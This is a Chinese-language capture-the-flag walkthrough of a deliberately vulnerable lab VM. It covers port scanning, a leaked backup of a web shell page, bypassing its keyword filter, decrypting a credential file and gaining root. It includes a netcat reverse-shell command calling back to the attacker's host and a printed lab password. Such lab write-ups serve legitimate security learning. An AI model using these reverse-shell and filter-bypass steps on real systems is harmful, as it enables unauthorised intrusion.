标签:页面 def deb ppa efault base cab 大写 time
? ~ ip a show dev vmnet8
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
inet 192.168.131.1/24 brd 192.168.131.255 scope global vmnet8
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fec0:8/64 scope link
valid_lft forever preferred_lft forever? ~ nmap -sn 192.168.131.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-10 21:27 CST
Nmap scan report for 192.168.131.1
Host is up (0.00018s latency).
Nmap scan report for 192.168.131.139
Host is up (0.00078s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.49 seconds
? ~
? ~ nmap -T4 -A 192.168.131.139 -p1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-10 21:28 CST
Nmap scan report for 192.168.131.139
Host is up (0.0019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.65 seconds
? ~ /login.php /dev_shell.php /lat_memo.html /passwords.html 把各个页面都看一遍发现有一个可以执行shell的页面。在lat_memo.html这个页面找到还有就得文件,可能是备份文件,在dev_shell.php后面加上bak,存在源码备份文件,下载回来获取过滤的规则。然后用脚绕。dev_shell.php过滤了"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc",还有;,如果你用msf生成的Python反弹木马没有上面的关键字可以使用msf的。我生成的木马base64编码后刚刚好有NC这个关键词。所以我换了其他方法。在nc前面加上绝对路径。/bin/nc -e /bin/sh 192.168.131.1 7788nc -lvp 7788,然后执行命令。python -c "import pty;pty,spawn(‘/bin/bash‘)";翻遍home目录www-data@Milburg-High:/home/bob/Documents$ ls
ls
Secret login.txt.gpg staff.txt
www-data@Milburg-High:/home/bob/Documents$ cat staff.txt
cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a shit about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
www-data@Milburg-High:/home/bob/Documents$
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ gpg
gpg
gpg: Fatal: can't create directory '/var/www/.gnupg': Permission denied
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here
<ents/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
ls
notes.sh
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"HARPOCRATES,刚刚也看到了一个gpg文件,所以这可能是解密的密码。但在目标机上执行gpg发现没权限。就开启python -m SimpleHTTPServer把文件下载回来本地解密了。? DOWNLOAD gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES 加密过的数据
gpg: 以 1 个密码加密
bob:b0bcat_? DOWNLOAD ssh bob@192.168.131.139 -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
bob@192.168.131.139's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 8 23:49:12 2018 from 192.168.56.1
bob@Milburg-High:~$ sudo cat /flag.txt
sudo: unable to resolve host Milburg-High
[sudo] password for bob:
CONGRATS ON GAINING ROOT
.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t
bob@Milburg-High:~$ 标签:页面 def deb ppa efault base cab 大写 time
原文地址:https://www.cnblogs.com/Kali-Team/p/12210975.html
